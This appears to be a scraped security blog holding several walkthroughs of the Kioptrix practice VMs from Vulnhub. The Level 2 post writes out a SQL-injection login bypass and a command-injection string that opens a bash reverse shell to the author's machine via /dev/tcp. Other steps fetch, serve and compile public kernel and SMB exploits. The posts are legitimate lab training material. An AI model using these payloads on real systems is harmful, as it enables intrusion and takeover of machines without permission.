<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBIYVt7hkbLUIAQ7nQnhJQGjwX-EvuhkfSsow1QeXUrEksWUTYBbBToW2osE9nYK3JxHFIjGPD_FcTKOI7FDGOZJligC5yuVKUoUZ2jCUxhHvwUqm-74Ldpa6ZFqf5XLL4Ih-7KHrN_LU/s1600/Screenshot+from+2017-02-15+13-19-02.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBIYVt7hkbLUIAQ7nQnhJQGjwX-EvuhkfSsow1QeXUrEksWUTYBbBToW2osE9nYK3JxHFIjGPD_FcTKOI7FDGOZJligC5yuVKUoUZ2jCUxhHvwUqm-74Ldpa6ZFqf5XLL4Ih-7KHrN_LU/s400/Screenshot+from+2017-02-15+13-19-02.png" width="400" /></a><br />
And there are these tables sitting on the server too.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s1600/Screenshot+from+2017-02-15+13-22-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s400/Screenshot+from+2017-02-15+13-22-08.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Enumerating the table "dev_accounts" gave:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s1600/Screenshot+from+2017-02-15+13-22-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s400/Screenshot+from+2017-02-15+13-22-08.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Grabbing the details from this gave:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuI6n58PcZdu4P5RV31K5R3RJ1batNRBoVMD02vXpFV74VLz5IwBJpRLgQYAW35L2DdAdNSg5HtQznEBPteh5tIDdxt8MZX2SpzXEzZEQHfJ4yM9Oui7rO7B0nDy6F9-GhbVkSkPhlL5o/s1600/Screenshot+from+2017-02-15+13-26-33.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuI6n58PcZdu4P5RV31K5R3RJ1batNRBoVMD02vXpFV74VLz5IwBJpRLgQYAW35L2DdAdNSg5HtQznEBPteh5tIDdxt8MZX2SpzXEzZEQHfJ4yM9Oui7rO7B0nDy6F9-GhbVkSkPhlL5o/s400/Screenshot+from+2017-02-15+13-26-33.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
MD5 hashed passwords for the 2 users we already had :)<br />
<br />
I could have used SQLmap to make it easier but sometimes you need to check manually as automation doesn't always make things better!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvcRtBFGsWE_3StYzQi1aYrZ9y_oZ1eHkLAjkBk-og-1QUYbDhkZLfHLrDAx6lIOOF6qoQ_f3dQSikDmlMSBQGRSsTM-itMR8x7_v-MvXGSpC2Mb9LPH01f3Rc4_rbIIcKOfOulMtOlw/s1600/Screenshot+from+2017-02-15+13-37-36.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvcRtBFGsWE_3StYzQi1aYrZ9y_oZ1eHkLAjkBk-og-1QUYbDhkZLfHLrDAx6lIOOF6qoQ_f3dQSikDmlMSBQGRSsTM-itMR8x7_v-MvXGSpC2Mb9LPH01f3Rc4_rbIIcKOfOulMtOlw/s400/Screenshot+from+2017-02-15+13-37-36.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u><br /></u></b>
<b><u>SQLi for Admin</u></b><br />
<b><u><br /></u></b>
By enumerating the gallarific_users table we get:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLse4xFtqvw84k3ihDg0sqtv5u9kXKA_VxIjPGGZfOpeYa4sm9nelkad3o3mh5khLryKv6JJ7yWz0mvSHhXLPfkmVD7VemVMZQD0VWMPOvwlENtMhms8zy79pZeM8mKAyY7FSzdyg23U/s1600/Screenshot+from+2017-02-15+13-45-32.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLse4xFtqvw84k3ihDg0sqtv5u9kXKA_VxIjPGGZfOpeYa4sm9nelkad3o3mh5khLryKv6JJ7yWz0mvSHhXLPfkmVD7VemVMZQD0VWMPOvwlENtMhms8zy79pZeM8mKAyY7FSzdyg23U/s400/Screenshot+from+2017-02-15+13-45-32.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Which allows me to login to the myphpadmin page and grab the creds of loneferret and dreg.<br />
<br />
There are other ways to root this box like using code injection to get a netcat shell, so go wild!!!<br />
<br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-78931959056023075842017-02-08T13:57:00.000+00:002017-02-08T14:19:38.030+00:00Kioptrix Level 2 Ping This!<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
I am really liking this VM series so far as I am the first to admit that my web app fu is not the best. This is allowing me to go back and test against simpler things as a confidence check for myself.<br />
<br />
So how did I root this VM?<br />
<br />
<b><u>It started with a scan</u></b><br />
<b><u><br />
</u></b> After performing a 1-65535 ports scan using NMap I found out the following ports were open.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJuoYGNzRCUd2Ooy79xS86ONcib7v4jrbBb2t2jG7kxvtKb0eZWs9ZenDgW_jjHzBYQ0Z-GmAZzbZZL0xOg40ZrJAQcoA95w-FanKfrPo1OVdWouJ2-0iKsKp_x0mTWai23JMRjWLTJXA/s1600/Screenshot+from+2017-02-08+10-00-24.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJuoYGNzRCUd2Ooy79xS86ONcib7v4jrbBb2t2jG7kxvtKb0eZWs9ZenDgW_jjHzBYQ0Z-GmAZzbZZL0xOg40ZrJAQcoA95w-FanKfrPo1OVdWouJ2-0iKsKp_x0mTWai23JMRjWLTJXA/s400/Screenshot+from+2017-02-08+10-00-24.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looking at the results it seemed sensible to look at port 80 first.<br />
<br />
This is what greeted me:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj79g6jD1kcrEyE83lh3h3M5yR27_X4V979YU_rwjHVIWg53K3ECneHDyGzS3nIfTZE8M1Ossr2_bNBUL7yOgICa2ZfOOA9N206uvUdlF5-6FEJnjdWJqHIgfeooePlxFYZN5rUoIKrp4Y/s1600/Screenshot+from+2017-02-08+10-02-29.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj79g6jD1kcrEyE83lh3h3M5yR27_X4V979YU_rwjHVIWg53K3ECneHDyGzS3nIfTZE8M1Ossr2_bNBUL7yOgICa2ZfOOA9N206uvUdlF5-6FEJnjdWJqHIgfeooePlxFYZN5rUoIKrp4Y/s400/Screenshot+from+2017-02-08+10-02-29.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
An admin login screen. After throwing in some random input into the user and pass fields it showed it was sat on "index.php" My first thought was "SQLinjection" and it turned out I was right.<br />
<br />
A simple:<br />
<br />
<pre class="brush: bash">' OR 1 = 1 -- (don't forget the space after the last - )
</pre>
Gave me access to this page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8qu0YiXHejvEBOeb-rd_sf7WocxKUuK3ifAyuoUxrpKt2RyRlW5dQatHejjlzGwOQADc1z297ksVIo26pC0IuJqkaBekxOSclXA6LRDqEpNu8XlunkjWksfwfH8uAo9FNDW4pTfx62iA/s1600/Screenshot+from+2017-02-08+10-10-35.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8qu0YiXHejvEBOeb-rd_sf7WocxKUuK3ifAyuoUxrpKt2RyRlW5dQatHejjlzGwOQADc1z297ksVIo26pC0IuJqkaBekxOSclXA6LRDqEpNu8XlunkjWksfwfH8uAo9FNDW4pTfx62iA/s400/Screenshot+from+2017-02-08+10-10-35.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I pinged an ip on my network and got this:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0RLMzoIF0zjitP2OiHgYaX5bcs70JUG0bR2bJGYOisjS2ggGTk0JgnK0e2eanRrSYNPsS4yEVT7ODYd-J4vBQfHPdDBP5LujWSmKcJTFMdiFi2w4LPEws8AxKwLbLz2fvCyNOiFmjmE/s1600/Screenshot+from+2017-02-08+10-11-49.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0RLMzoIF0zjitP2OiHgYaX5bcs70JUG0bR2bJGYOisjS2ggGTk0JgnK0e2eanRrSYNPsS4yEVT7ODYd-J4vBQfHPdDBP5LujWSmKcJTFMdiFi2w4LPEws8AxKwLbLz2fvCyNOiFmjmE/s400/Screenshot+from+2017-02-08+10-11-49.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It looks like by putting in an ip address and clicking submit calls the pingit.php page. This shows that it echoes back the ip I typed then actually pings it. There is a chance I can inject my own commands here. <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b><u>Command injection </u></b><br />
<b><br />
</b> <u><a href="http://cwe.mitre.org/data/definitions/78.html"><i>Definition</i></a></u><br />
<b><u><br />
</u></b> This method is great for getting shells on boxes.<br />
<br />
A look at the source code showed:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfBzOK1uXSL_D9-I-SHGI8xXs_dmPuJIn7JUEEkYrkg9A6jcqE6y3YqzKhYIgOfoyBKM2CN1FK3WdTymb3pmYdNUVGIsG5AL3N5CGZEAMXLjF6oFxJXbnQaRXzMRExYdzaYvjb7rvh6Wg/s1600/Screenshot+from+2017-02-08+10-21-49.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfBzOK1uXSL_D9-I-SHGI8xXs_dmPuJIn7JUEEkYrkg9A6jcqE6y3YqzKhYIgOfoyBKM2CN1FK3WdTymb3pmYdNUVGIsG5AL3N5CGZEAMXLjF6oFxJXbnQaRXzMRExYdzaYvjb7rvh6Wg/s400/Screenshot+from+2017-02-08+10-21-49.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The data in the box isn't being sanitised, so my chances of injection now look good :)<br />
<br />
I try to list the directory of the website:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmppZUmqz3rYAtEk-OrZAwbcq_3zV7ddJmNyALFUrKtPfp1Q9K4H7qihcdf87fbsDbl1hy8DGGi4c_tqwlsWykbNbD4WAPhoKjEE6gXIyCDLYycSumbR17gAVotkYEMrnxpq9Pe_GhgA/s1600/Screenshot+from+2017-02-08+10-29-18.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmppZUmqz3rYAtEk-OrZAwbcq_3zV7ddJmNyALFUrKtPfp1Q9K4H7qihcdf87fbsDbl1hy8DGGi4c_tqwlsWykbNbD4WAPhoKjEE6gXIyCDLYycSumbR17gAVotkYEMrnxpq9Pe_GhgA/s320/Screenshot+from+2017-02-08+10-29-18.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And it works!<br />
<br />
Now to try to see if I can use a simple bash reverse shell with a netcat listener:<br />
<br />
On my attack box I type:<br />
<br />
<pre class="brush: bash">netcat -v -l -p 4444 </pre>
<br />
This is essentially making my box sit and listen for any connections calling into it on this port.<br />
<br />
On the vulnerable web app I type:<br />
<br />
<pre class="brush: bash">192.168.1.1; bash -i >& /dev/tcp/192.168.1.17/4444 0>&1
</pre>
<br />
This should open a bash reverse shell on my machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSKuqBoC4HXuNKfK3NLy9nHWuDtNYQLc3ZnpPJMGg1p4GObLc4vByk5BUBjxN-RMMQMvUHRfA8IFPunoyFKRKfktXMBhNrQHe1YfiKAIIkVXQ3UW9HULe7tilxDtRRJSD6pPyB311RIVE/s1600/Screenshot+from+2017-02-08+10-38-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSKuqBoC4HXuNKfK3NLy9nHWuDtNYQLc3ZnpPJMGg1p4GObLc4vByk5BUBjxN-RMMQMvUHRfA8IFPunoyFKRKfktXMBhNrQHe1YfiKAIIkVXQ3UW9HULe7tilxDtRRJSD6pPyB311RIVE/s400/Screenshot+from+2017-02-08+10-38-41.png" width="400" /></a></div>
<br />
<br />
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And it does. Unfortunately I am only in as apache, so I need to look at elevating my privileges in order to root this box.<br />
<br />
Now it was time to start enumerating the box to see what was under the hood.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyigeKtg23wPOFMwsOkQ3-o892tUBlfFwEdlYt526zucjMJn810IEC9wcr-HRm7uMpvk0y0wjk6RZu18DjkSp0aDToRJSTQq5HMXLWxaI6ZR-pXT3zS-4-h_N6R4jxIeHeZKmzfbhRFRo/s1600/Screenshot+from+2017-02-08+13-25-51.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyigeKtg23wPOFMwsOkQ3-o892tUBlfFwEdlYt526zucjMJn810IEC9wcr-HRm7uMpvk0y0wjk6RZu18DjkSp0aDToRJSTQq5HMXLWxaI6ZR-pXT3zS-4-h_N6R4jxIeHeZKmzfbhRFRo/s400/Screenshot+from+2017-02-08+13-25-51.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like I have CentOS 4.5 sat on the Linux kernel 2.6.9 Research lead me to <a href="https://www.exploit-db.com/exploits/9542/">Exploit-DB</a><br />
This exploit scores reasonably high over at <a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2698">National Vulnerability Database</a> so should be quite useful!<br />
<br />
I need to see what other tools are sat on this box as I need to be able to transfer the file over.<br />
<br />
A quick type of wget show it's installed so that will be handy :)<br />
<br />
On my attack box, I wget the code from Exploit-DB:<br />
<br />
<pre class="brush: bash">wget https://www.exploit-db.com/download/9542</pre>
<br />
I then start up a web server on my attack box<br />
<br />
<pre class="brush: bash">python -m SimpleHTTPServer 80 </pre>
<br />
Now I am serving out the file I can now transfer it to the vulnerable server.<br />
<br />
I wget the file from my attack box:<br />
<br />
<pre class="brush: bash">cd /tmp</pre>
This is a location I can write to.<br />
<br />
<pre class="brush: bash">wget http://192.168.1.17/9542.c</pre>
<br />
Now I have the code, it's time to compile it.<br />
<br />
<pre class="brush: bash">gcc -o pwn 9542.c</pre>
<br />
I now have an executable file to run.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3uY5LmO60_90esHygFxP4768g7rsWQWLy0FzDbNwMc2VuwFRiK7Ur_Dz9HrCPcBIjX2szh0CE0vLR9oVqXhG1gJbiPevm6XYX0BY2isQrdm841i55i8XcaVztUXG2xBKBBRbvV6yP5mc/s1600/Screenshot+from+2017-02-08+13-54-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3uY5LmO60_90esHygFxP4768g7rsWQWLy0FzDbNwMc2VuwFRiK7Ur_Dz9HrCPcBIjX2szh0CE0vLR9oVqXhG1gJbiPevm6XYX0BY2isQrdm841i55i8XcaVztUXG2xBKBBRbvV6yP5mc/s400/Screenshot+from+2017-02-08+13-54-07.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Another #tangodown <br />
<br />
<b><u>Conclusion</u></b><br />
<b><u><br /></u></b>
I went into this vm with an attitude that I was going to be looking for local exploits (SUID) for some reason? This sent me off on a bit of a tangent to be honest. However once I slapped myself, I got the quickly.<br />
<br />
Until next time, bye!!!!! </div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-53155282011359645772017-02-07T10:26:00.004+00:002017-02-08T14:19:38.020+00:00Kioptrix Level 1 (Via SMB)<div dir="ltr" style="text-align: left;" trbidi="on">
Round 2 of Kioptrix!!<br />
<br />
As we saw from the initial NMap scan port 139 was open.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOmR4J6t-pB94TMbR_IPwzH_ZdqSy0O9Z5GGDPQ6dOvBNjXopmkYSffNFJIciZZpUliXZMwMSA8XIRZncDQv-udLUMAQkUdk7ZXa_hqku0B9IkKrWrgYChcorC4_CrL3s5y0kzB9ABK1M/s1600/Screenshot+from+2017-01-23+10-24-28.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOmR4J6t-pB94TMbR_IPwzH_ZdqSy0O9Z5GGDPQ6dOvBNjXopmkYSffNFJIciZZpUliXZMwMSA8XIRZncDQv-udLUMAQkUdk7ZXa_hqku0B9IkKrWrgYChcorC4_CrL3s5y0kzB9ABK1M/s640/Screenshot+from+2017-01-23+10-24-28.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It's time to start prodding that beast. I use SMBClient to see if anonymous logins are allowed:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbDjzzY2lao1F6ciC8FcRsML_CQcsM5ih_mBa4PDdD3ZWnsKLAuL07W1rK8bO-trgdtO65BNtf57r697FKPJwdGGREhL7aN2xr0fj3oiClCKVyB8Ct9GJqui_iUbeuK9sF_hyphenhyphentnxDEXw/s1600/Screenshot+from+2017-02-07+09-58-02.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbDjzzY2lao1F6ciC8FcRsML_CQcsM5ih_mBa4PDdD3ZWnsKLAuL07W1rK8bO-trgdtO65BNtf57r697FKPJwdGGREhL7aN2xr0fj3oiClCKVyB8Ct9GJqui_iUbeuK9sF_hyphenhyphentnxDEXw/s400/Screenshot+from+2017-02-07+09-58-02.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I will take that as a yes!<br />
<br />
The SMB version running is 2.2.1a so it's time to start looking for exploits!<br />
<br />
Using searchsploit I found 2 possibilities for manual execution (I want to stay away from Metasploit):<br />
<br />
7.pl & 10.c<br />
<br />
I had a look at 10.c exploit <a href="https://www.exploit-db.com/exploits/10/">Exploit-DB</a><br />
<br />
This seemed to be a good exploit to look at.<br />
<br />
Time to grab and compile!!<br />
<br />
<pre class="brush: bash">gcc -o smb 10.c </pre>
<br />
So lets run this little beast.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhirfiOPhOiiIY1o19s7JX0xBT5jZHCG5mcRk4xECN28cQiNRFaZ29ldTimzPHpBtsWswU1iJMkclz4TAPMG8I5JD9hNkRHPGv-8lkPrUPpOAOs8_8W5tVpCHikw-bE1Y2UHnJSVAdUyFY/s1600/Screenshot+from+2017-02-07+10-23-05.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhirfiOPhOiiIY1o19s7JX0xBT5jZHCG5mcRk4xECN28cQiNRFaZ29ldTimzPHpBtsWswU1iJMkclz4TAPMG8I5JD9hNkRHPGv-8lkPrUPpOAOs8_8W5tVpCHikw-bE1Y2UHnJSVAdUyFY/s400/Screenshot+from+2017-02-07+10-23-05.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
Looks like I need to choose -B0, -c (My IP), </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkDP6BTnTWyAWmHn3VEL7AHA8SioY4SuZaJzSYK1z5svo7QQu0pj7Ln6Rif6YyaHx8laCHL0De9UoahYiNF8Wxqbzin3i5_ZSxj3vZe_hplFGUpjOVYP6ONzmbhrddsUyoFPGOmi9htgw/s1600/Screenshot+from+2017-02-07+10-24-01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkDP6BTnTWyAWmHn3VEL7AHA8SioY4SuZaJzSYK1z5svo7QQu0pj7Ln6Rif6YyaHx8laCHL0De9UoahYiNF8Wxqbzin3i5_ZSxj3vZe_hplFGUpjOVYP6ONzmbhrddsUyoFPGOmi9htgw/s400/Screenshot+from+2017-02-07+10-24-01.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So there we have it! Kioptrix 1 #tangodown<br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-6803037251481656662017-02-07T09:40:00.000+00:002017-02-08T14:19:38.025+00:00Kioptrix Level 1 (Via Web Vuln)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
I have been absent from this blog for a while now. This is mainly due to the festivities, family and work. Now everything has calmed down, I can start "playing" again. I decided to ease back into things with the Kioptrix series from Vulnhub. This series is aimed to be easy and to be honest the first one was, "however" I ended up looking way to deep and not thinking simple!!<br />
<br />
So first things first.<br />
<br />
Let's start by using Netdiscover to see what IP the VM is on:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMzqC59NnuehCYr8RZHbrjrlZ5LwaQ4Am07wRvtey9rztPa4z7HKh_3xdBiUvGPGGJ4SUntTQd77njAkYVmhNOhnkKqkBafuzwFn8EUZKl-5g0fc_GbMdS-EtBWc0ZjhaYD3a0YJaqEI/s1600/Screenshot+from+2017-01-23+10-22-16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMzqC59NnuehCYr8RZHbrjrlZ5LwaQ4Am07wRvtey9rztPa4z7HKh_3xdBiUvGPGGJ4SUntTQd77njAkYVmhNOhnkKqkBafuzwFn8EUZKl-5g0fc_GbMdS-EtBWc0ZjhaYD3a0YJaqEI/s320/Screenshot+from+2017-01-23+10-22-16.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Netdiscover shows .132 is my IP of choice.</div>
<div class="separator" style="clear: bothw; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I'll NMap ports 1-65535 this IP using grep to show open ports, I do this to get a cleaner output than just running NMap:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw0bw4B6Pv9jgE7BZh8LFU3WoLkZ1l3MBsTu-7CyB9LVnwx0psTF5fezLBgkZMnt6sYaExoEWXqd-k1JpVpwA4K056Uomn1AA_TY6n6fN0Dat4kGdPLcdu-A57efJTdCHBGWRXIg4ei_8/s1600/Screenshot+from+2017-01-23+10-24-28.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw0bw4B6Pv9jgE7BZh8LFU3WoLkZ1l3MBsTu-7CyB9LVnwx0psTF5fezLBgkZMnt6sYaExoEWXqd-k1JpVpwA4K056Uomn1AA_TY6n6fN0Dat4kGdPLcdu-A57efJTdCHBGWRXIg4ei_8/s320/Screenshot+from+2017-01-23+10-24-28.png" width="320" /></a><span style="clear: left; color: black; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;">Now I have something to play with</span><span style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;">I'll check out ports 80 & 443 firs<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw0bw4B6Pv9jgE7BZh8LFU3WoLkZ1l3MBsTu-7CyB9LVnwx0psTF5fezLBgkZMnt6sYaExoEWXqd-k1JpVpwA4K056Uomn1AA_TY6n6fN0Dat4kGdPLcdu-A57efJTdCHBGWRXIg4ei_8/s1600/Screenshot+from+2017-01-23+10-24-28.png" imageanchor="1" style="text-align: center;"><span style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: left;">t:</span></a></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
